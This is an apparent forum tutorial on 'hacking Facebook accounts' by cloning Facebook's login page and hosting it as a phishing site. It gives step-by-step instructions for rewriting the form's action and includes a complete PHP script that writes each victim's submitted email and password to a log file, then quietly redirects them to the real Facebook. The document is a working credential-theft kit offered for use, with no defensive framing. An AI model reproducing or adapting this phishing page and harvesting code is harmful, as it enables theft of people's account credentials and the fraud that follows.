Hacking Facebook Accounts is Easy with Fake login Page. To Make a Fake Login Page for Facebook. You Need to have some basic php and html skills.
Go to http://www.facebook.com/index.php and Save the Page as , I recommend Mozilla Firefox for this. Web Page Complete.
Once You Save the Files Put them in a Separate Directory. And Open the .htm file in Notepad. Find "action =" and replace the link with "login.php" or whatever you call your php file.
like
action=there will be link but u should remove it and type action="login.php"
then You should Create the php File.Copy this code to Notepad
<?php
header ('Location: http://www.facebook.com/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
if($variable=="email" || $variable == "pass")
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it as "login.php" or Whatever you call in action=" " put all the files in the directory.
then Create an Account in a site which i will write in comment and upload all the files in the directory.